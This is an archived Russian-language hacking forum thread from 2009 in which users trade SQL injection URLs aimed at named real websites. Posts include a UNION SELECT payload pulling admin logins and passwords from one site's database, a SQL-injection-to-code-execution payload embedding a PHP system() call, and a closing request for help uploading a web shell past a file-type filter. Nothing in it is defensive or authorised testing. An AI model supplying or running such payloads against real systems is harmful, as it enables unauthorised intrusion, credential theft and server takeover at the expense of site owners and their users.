ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

05.05.2009, 15:59
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме: 2584134
Репутация:
519
|
|
2mailbrush
Да, там действительно ограничение количества символов в урле:
Код:
http://www.ncmec.eu/case.php?Id=1*1*1*1*1*1*1*1*1*1*1--+
Query failed: SELECT * FROM caseTbl WHERE ID=1*1*;
Код:
http://www.ncmec.eu/case.php?Id=1+order+by+1--+
Query failed: SELECT * FROM caseTbl WHERE ID=1 or;
ограничение на 3 символа после Id=
На счёт обхода не скажу ничего, ибо не видел ни разу статтей на подобную тему, но по сути ограничение прописывается в настройках сервера...
Последний раз редактировалось -m0rgan-; 05.05.2009 в 16:04..
|
|
|

05.05.2009, 16:20
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
-m0rgan-, почисти ПМ. Насчет поста http://forum.antichat.ru/showpost.php?p=1259709&postcount=9197 - скорее всего, ты тупишь. Смотри, выбраная БД - b35015_catalo, а для cizar_admin
Код:
http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,table_schema,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/information_schema.tables/**/where/**/table_name=0x63697a61725f61646d696e
b35015_a. Таким образом
Код:
http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,concat_ws(0x3a,id,login,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/b35015_a.cizar_admin
|
|
|

05.05.2009, 16:30
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме: 2753780
Репутация:
585
|
|
Сообщение от -m0rgan-
2mailbrush
Да, там действительно ограничение количества символов в урле:
Код:
http://www.ncmec.eu/case.php?Id=1*1*1*1*1*1*1*1*1*1*1--+
Query failed: SELECT * FROM caseTbl WHERE ID=1*1*;
Код:
http://www.ncmec.eu/case.php?Id=1+order+by+1--+
Query failed: SELECT * FROM caseTbl WHERE ID=1 or;
ограничение на 3 символа после Id=
На счёт обхода не скажу ничего, ибо не видел ни разу статтей на подобную тему, но по сути ограничение прописывается в настройках сервера...
Не не, тут явно в самом скрипте данные отрезаются, например, субстрингом: substr($_GET['Id'], 0, 4); . Инъекцию провести наврядли выйдет. (;
|
|
|

05.05.2009, 16:39
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме: 2584134
Репутация:
519
|
|
Да, я реально ступил, я почему то забыл про database() 
|
|
|

05.05.2009, 17:16
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме: 2584134
Репутация:
519
|
|
Сообщение от cr0w
Не не, тут явно в самом скрипте данные отрезаются, например, субстрингом: substr($_GET['Id'], 0, 4); . Инъекцию провести наврядли выйдет. (;
Да, скорее всего ты прав, ибо ограничение стиит только на параметры, а длинна ссыли может быть большой...
Но здесь факт в том, что хз как такое ограничение обойти 
|
|
|

05.05.2009, 17:33
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Не хз как, а никак =)
|
|
|

05.05.2009, 21:30
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме: 2584134
Репутация:
519
|
|
Вот появился вопросик...
Что есть RFI SQL INJECTION и где можно почитать о её применении?
Спасибо!
|
|
|

05.05.2009, 22:10
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
-m0rgan-, не слышал о RFI SQL INJECTION, мб просто RFI? RFI/LFI - Remote File Include / Local File Inlude. Почитать:
http://forum.antichat.ru/thread12123.html
http://forum.antichat.ru/thread23501.html
http://forum.antichat.ru/thread91807.html
http://forum.antichat.ru/thread98525.html
http://forum.antichat.ru/thread49775.html
|
|
|

05.05.2009, 22:31
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме: 2753780
Репутация:
585
|
|
-m0rgan-
Возможно, ты имеешь в виду те случаи, когда из SQL-запроса возвращается имя файла, который затем инклудится, т.е. RFI (или LFI) проводится через SQL-инъекцию, типа:
Код:
http://www.site.com/index.php?id=-1+union+select+1,2,[RFI],4,5
?
Встречается иногда и PHP-injection (точнее, Code Execution, так как не только с php такое возможно) через SQL-injection , когда SQL-запрос возвращает код, который затем выполняется скриптом, тогда эксплуатация выглядит примерно так:
Код:
http://www.site.com/index.php?id=-1+union+select+1,2,'<?php system($_GET[a]); ?>',4,5&a=ls
Последний раз редактировалось cr0w; 05.05.2009 в 22:47..
|
|
|

06.05.2009, 01:10
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме: 170912
Репутация:
-4
|
|
приятного времени суток.
Возник вопрос по поводу dx shell.
хочу загрузить его на сайт ,через админку. но могу это сделать тока в формате : gif, jpg, png, htm, html, pdf, zip, swf, mp3, flv, doc, docx, xls, xlsx, rtf
И почему то он у меня открывается в виде кода .
подскажите ,kak правильно залить шелл и запустить
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|